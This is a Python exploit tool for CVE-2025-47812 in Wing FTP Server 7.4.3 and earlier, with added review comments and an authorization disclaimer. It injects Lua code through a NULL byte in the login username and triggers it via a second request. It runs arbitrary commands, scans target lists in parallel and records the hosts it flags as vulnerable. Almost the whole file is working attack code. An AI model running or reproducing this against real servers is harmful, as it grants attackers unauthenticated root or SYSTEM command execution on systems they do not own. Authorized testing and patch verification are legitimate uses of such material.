#!/usr/bin/env python3
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Original Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Modified by: d3vn0mi (https://github.com/d3vn0mi)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
#   Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated
#   remote code execution (RCE) flaw (CVE-2025-47812). This vulnerability arises from
#   improper handling of NULL bytes in the 'username' parameter during login, leading
#   to Lua code injection into session files. These maliciously crafted session files
#   are subsequently executed when authenticated functionalities (e.g., /dir.html) are
#   accessed, resulting in arbitrary command execution on the server with elevated
#   privileges (root on Linux, SYSTEM on Windows).
#
# NOTE: Only run this against systems you own or are explicitly authorized to
# test. Per the description above, upgrading to 7.4.4 or later is the remediation.

import argparse
import logging
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import quote, urlparse

import requests
import urllib3

# Silence urllib3's InsecureRequestWarning. This call runs unconditionally at
# import time, i.e. the warning is suppressed whether or not --no-verify is used.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Text printed to stdout at startup by main().
# NOTE(review): the ASCII art appears to have been flattened onto one line
# (whitespace collapsed); presumably it was multi-line originally. It is kept
# exactly as found because it is runtime output.
BANNER = r""" ____ _______ ___ __ ____ __ ___ ____ / __ \|__ / | / / | / / __ \/ |/ // _/ / / / / /_ <| | / /| |/ / / / / /|_/ / / / / /_/ /___/ /| |/ / | / /_/ / / / /_/ / /_____/____/ |___/ |_/ \____/_/ /_/____/ CVE-2025-47812 | Wing FTP Server <= 7.4.3 Unauthenticated Remote Code Execution Original Author: 4m3rr0r | Modified: d3vn0mi """

# Default command used when no custom command is provided (safe check)
DEFAULT_CHECK_CMD = "echo CVE-2025-47812-VULN"
# NOTE(review): VULN_MARKER is defined here but is not referenced anywhere else
# in the visible source; the detection logic in run_exploit() does not use it.
VULN_MARKER = "CVE-2025-47812-VULN"

# Configure module-level logger
logger = logging.getLogger("cve-2025-47812")


def setup_logging(verbose: bool = False, log_file: str | None = None) -> None:
    """Configure logging with console and optional file output.

    Args:
        verbose: When true the logger and console handler use DEBUG,
            otherwise INFO.
        log_file: Optional path; when given, a UTF-8 file handler using the
            plain (uncoloured) formatter is attached as well.

    Handlers are appended on every call; there is no guard against calling
    this function twice.
    """
    level = logging.DEBUG if verbose else logging.INFO
    logger.setLevel(level)

    formatter = logging.Formatter(
        "%(asctime)s [%(levelname)s] %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )

    # Console handler with color support
    console = logging.StreamHandler(sys.stderr)
    console.setLevel(level)
    console.setFormatter(_ColorFormatter(formatter))
    logger.addHandler(console)

    # Optional file handler (no colors)
    if log_file:
        fh = logging.FileHandler(log_file, encoding="utf-8")
        # The handler accepts DEBUG, but records are still filtered by the
        # logger's own level set above, so DEBUG lines reach the file only
        # when verbose is true.
        fh.setLevel(logging.DEBUG)
        fh.setFormatter(formatter)
        logger.addHandler(fh)
        logger.info("Logging to file: %s", log_file)


class _ColorFormatter(logging.Formatter):
    """Wrap an existing formatter to inject ANSI colors per level."""

    # Maps a logging level number to the ANSI escape that starts its colour.
    COLORS = {
        logging.DEBUG: "\033[90m",  # gray
        logging.INFO: "\033[92m",  # green
        logging.WARNING: "\033[93m",  # yellow
        logging.ERROR: "\033[91m",  # red
        logging.CRITICAL: "\033[95m",  # magenta
    }
    # ANSI escape that resets attributes; always appended, even when the level
    # has no entry in COLORS.
    RESET = "\033[0m"

    def __init__(self, base_formatter: logging.Formatter):
        """Store the formatter whose output will be wrapped in colour codes."""
        super().__init__()
        self._base = base_formatter

    def format(self, record: logging.LogRecord) -> str:
        """Return the base formatter's output surrounded by colour + reset."""
        msg = self._base.format(record)
        color = self.COLORS.get(record.levelno, "")
        return f"{color}{msg}{self.RESET}"


def validate_url(url: str) -> str:
    """Normalise and validate a target URL.

    Trailing slashes are stripped, then the URL is parsed.

    Returns:
        The URL without trailing slashes.

    Raises:
        ValueError: If the scheme is not http/https or no hostname is present.
    """
    url = url.rstrip("/")
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"Unsupported URL scheme: {parsed.scheme!r}")
    if not parsed.hostname:
        raise ValueError(f"Missing hostname in URL: {url!r}")
    return url


def build_payload(username: str, password: str, command: str) -> str:
    """Construct the injection payload for the login POST body.

    ``username`` and ``password`` are percent-encoded with ``quote``;
    ``command`` is interpolated into the body verbatim.

    Returns:
        A pre-encoded ``application/x-www-form-urlencoded`` body string.
    """
    encoded_username = quote(username)
    encoded_password = quote(password)

    # The NULL byte terminates the C string in c_CheckUser(), but the full
    # username (including Lua code) is written into the session file.
    lua_injection = (
        "%00]]%0d"
        f"local+h+%3d+io.popen(\"{command}\")%0d"
        "local+r+%3d+h%3aread(\"*a\")%0d"
        "h%3aclose()%0d"
        "print(r)%0d"
        "--"
    )

    return f"username={encoded_username}{lua_injection}&password={encoded_password}"


def run_exploit(
    target_url: str,
    command: str,
    username: str = "anonymous",
    password: str = "",
    timeout: int = 15,
    verify_ssl: bool = True,
    retries: int = 2,
) -> tuple[bool, str]:
    """
    Execute the CVE-2025-47812 exploit against a single target.

    Performs two HTTP requests: a POST to ``/loginok.html`` carrying the
    payload, then a GET to ``/dir.html`` using the ``UID`` cookie returned by
    the first response.

    Returns a tuple of (is_vulnerable: bool, output: str). ``(False, "")`` is
    returned when either request fails or no ``UID`` cookie is found.

    Raises:
        ValueError: Propagated from validate_url() for an invalid target.
    """
    target_url = validate_url(target_url)
    host = urlparse(target_url).netloc

    # Browser-like headers shared by both requests.
    common_headers = {
        "Host": host,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
    }

    login_url = f"{target_url}/loginok.html"
    payload = build_payload(username, password, command)

    login_headers = {
        **common_headers,
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": target_url,
        "Referer": f"{target_url}/login.html?lang=english",
        "Cookie": "client_lang=english",
    }

    # --- Stage 1: POST to inject Lua via session file ---
    logger.debug("Stage 1 -> POST %s (user=%s, cmd=%s)", login_url, username, command)
    login_response = _request_with_retry(
        "POST",
        login_url,
        headers=login_headers,
        data=payload,
        timeout=timeout,
        verify=verify_ssl,
        retries=retries,
    )
    if login_response is None:
        return False, ""

    # The session identifier is read from the raw Set-Cookie header text.
    set_cookie = login_response.headers.get("Set-Cookie", "")
    match = re.search(r"UID=([^;]+)", set_cookie)
    if not match:
        logger.error("UID not found in Set-Cookie for %s — exploit may have failed", target_url)
        return False, ""

    uid = match.group(1)
    logger.debug("Extracted UID: %s", uid)

    # --- Stage 2: GET /dir.html to trigger Lua execution ---
    dir_url = f"{target_url}/dir.html"
    dir_headers = {
        **common_headers,
        "Cookie": f"UID={uid}",
    }

    logger.debug("Stage 2 -> GET %s (UID=%s)", dir_url, uid)
    dir_response = _request_with_retry(
        "GET",
        dir_url,
        headers=dir_headers,
        timeout=timeout,
        verify=verify_ssl,
        retries=retries,
    )
    if dir_response is None:
        return False, ""

    # Extract command output (appears before XML response body)
    body = dir_response.text
    clean_output = re.split(r"<\?xml", body)[0].strip()

    # NOTE(review): any non-empty text before "<?xml" counts as vulnerable,
    # including a body that contains no XML at all (e.g. an HTML page). The
    # result is not compared against VULN_MARKER, so false positives are
    # possible — confirm whether that is intended.
    is_vuln = bool(clean_output)
    if is_vuln:
        logger.info("VULNERABLE: %s", target_url)
    else:
        logger.warning("Not vulnerable: %s", target_url)

    return is_vuln, clean_output


def _request_with_retry(
    method: str,
    url: str,
    retries: int = 2,
    **kwargs,
) -> requests.Response | None:
    """Send an HTTP request with retry + exponential backoff on failure.

    Args:
        method: HTTP method name passed to ``requests.request``.
        url: Request URL.
        retries: Number of additional attempts after the first one.
        **kwargs: Forwarded unchanged to ``requests.request``.

    Returns:
        The response on success, or ``None`` once all attempts have failed.
        Because ``raise_for_status()`` is called, HTTP 4xx/5xx responses are
        treated as failures and retried like connection errors.
    """
    # NOTE(review): last_err is assigned below but never read.
    last_err = None
    for attempt in range(1, retries + 2):  # retries + 1 total attempts
        try:
            resp = requests.request(method, url, **kwargs)
            resp.raise_for_status()
            return resp
        except requests.exceptions.RequestException as exc:
            last_err = exc
            if attempt <= retries:
                # Backoff doubles per attempt: 2s, 4s, 8s, ...
                wait = 2 ** attempt
                logger.warning(
                    "Request to %s failed (attempt %d/%d): %s — retrying in %ds",
                    url, attempt, retries + 1, exc, wait,
                )
                time.sleep(wait)
            else:
                logger.error("Request to %s failed after %d attempts: %s", url, attempt, exc)
    return None


def load_targets(url: str | None, filepath: str | None) -> list[str]:
    """Return a deduplicated list of target URLs from CLI args.

    Entries from ``filepath`` (blank lines and lines starting with ``#``
    skipped) come first, followed by ``url`` if given. Trailing slashes are
    stripped before comparison and first-seen order is preserved. No URL
    validation happens here.

    Exits the process with status 1 if the file cannot be read.
    """
    targets: list[str] = []

    if filepath:
        try:
            # Opened with the platform default encoding (none is specified).
            with open(filepath, "r") as fh:
                for line in fh:
                    stripped = line.strip()
                    if stripped and not stripped.startswith("#"):
                        targets.append(stripped)
        except OSError as exc:
            logger.error("Could not read target file %r: %s", filepath, exc)
            sys.exit(1)

    if url:
        targets.append(url)

    # Deduplicate while preserving order
    seen: set[str] = set()
    unique: list[str] = []
    for t in targets:
        normed = t.rstrip("/")
        if normed not in seen:
            seen.add(normed)
            unique.append(normed)
    return unique


def main() -> None:
    """Parse CLI arguments, run the check against each target, and report.

    Targets are processed through a thread pool sized by ``--threads``.
    Vulnerable targets are collected and, if ``--output`` is given and at
    least one was found, written to that file one per line.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-47812 — Wing FTP Server <= 7.4.3 Unauthenticated RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="Examples:\n"
               " %(prog)s -u http://192.168.1.10\n"
               " %(prog)s -u http://192.168.1.10 -c 'id'\n"
               " %(prog)s -f targets.txt -o vuln.txt -t 8\n",
    )

    target_group = parser.add_argument_group("target")
    target_group.add_argument(
        "-u", "--url",
        type=str,
        help="Single target URL (e.g. http://192.168.134.130)",
    )
    target_group.add_argument(
        "-f", "--file",
        type=str,
        help="File containing target URLs (one per line, # comments allowed)",
    )

    exploit_group = parser.add_argument_group("exploit options")
    exploit_group.add_argument(
        "-c", "--command",
        type=str,
        help="Command to execute on the remote server (enables verbose output)",
    )
    exploit_group.add_argument(
        "-U", "--username",
        type=str,
        default="anonymous",
        help="Username for the exploit payload (default: anonymous)",
    )
    exploit_group.add_argument(
        "-P", "--password",
        type=str,
        default="",
        help="Password for the exploit payload (default: empty)",
    )

    output_group = parser.add_argument_group("output")
    output_group.add_argument(
        "-v", "--verbose",
        action="store_true",
        help="Enable verbose / debug logging",
    )
    output_group.add_argument(
        "-o", "--output",
        type=str,
        help="Save vulnerable URLs to this file",
    )
    output_group.add_argument(
        "-l", "--log-file",
        type=str,
        help="Write detailed log to this file",
    )

    net_group = parser.add_argument_group("network")
    net_group.add_argument(
        "-t", "--threads",
        type=int,
        default=1,
        help="Number of concurrent threads for multi-target scans (default: 1)",
    )
    net_group.add_argument(
        "--timeout",
        type=int,
        default=15,
        help="HTTP request timeout in seconds (default: 15)",
    )
    net_group.add_argument(
        "--retries",
        type=int,
        default=2,
        help="Number of retries on connection failure (default: 2)",
    )
    net_group.add_argument(
        "--no-verify",
        action="store_true",
        help="Disable SSL certificate verification",
    )

    args = parser.parse_args()

    if not args.url and not args.file:
        parser.error("Either -u/--url or -f/--file must be specified.")

    # When a custom command is provided, force verbose so the user sees output
    verbose = args.verbose or bool(args.command)
    setup_logging(verbose=verbose, log_file=args.log_file)

    print(BANNER)

    command = args.command if args.command else DEFAULT_CHECK_CMD
    targets = load_targets(args.url, args.file)

    if not targets:
        logger.error("No valid targets provided.")
        sys.exit(1)

    logger.info("Loaded %d target(s) — threads=%d, timeout=%ds, retries=%d",
                len(targets), args.threads, args.timeout, args.retries)

    vulnerable: list[str] = []
    verify_ssl = not args.no_verify

    def _attack(target: str) -> tuple[str, bool, str]:
        """Run run_exploit() for one target using the parsed CLI options."""
        is_vuln, output = run_exploit(
            target,
            command,
            username=args.username,
            password=args.password,
            timeout=args.timeout,
            verify_ssl=verify_ssl,
            retries=args.retries,
        )
        return target, is_vuln, output

    with ThreadPoolExecutor(max_workers=args.threads) as pool:
        # Map each future back to its target so failures can be attributed.
        futures = {pool.submit(_attack, t): t for t in targets}
        for future in as_completed(futures):
            target = futures[future]
            try:
                target, is_vuln, output = future.result()
            except Exception:
                # Includes ValueError raised by validate_url() for bad targets.
                logger.exception("Unhandled error processing %s", target)
                continue

            if is_vuln:
                vulnerable.append(target)
                # NOTE(review): nesting of this block under `if is_vuln` is
                # inferred; the source had lost its indentation.
                if args.command:
                    print(f"\n--- Output from {target} ---")
                    print(output)
                    print("----------------------------\n")

    # Summary
    print()
    logger.info("Scan complete: %d/%d targets vulnerable", len(vulnerable), len(targets))

    # The output file is only created when at least one target was flagged.
    if args.output and vulnerable:
        try:
            with open(args.output, "w") as out_file:
                for site in vulnerable:
                    out_file.write(site + "\n")
            logger.info("Vulnerable URLs saved to: %s", args.output)
        except OSError as exc:
            logger.error("Could not write to output file %r: %s", args.output, exc)


if __name__ == "__main__":
    main()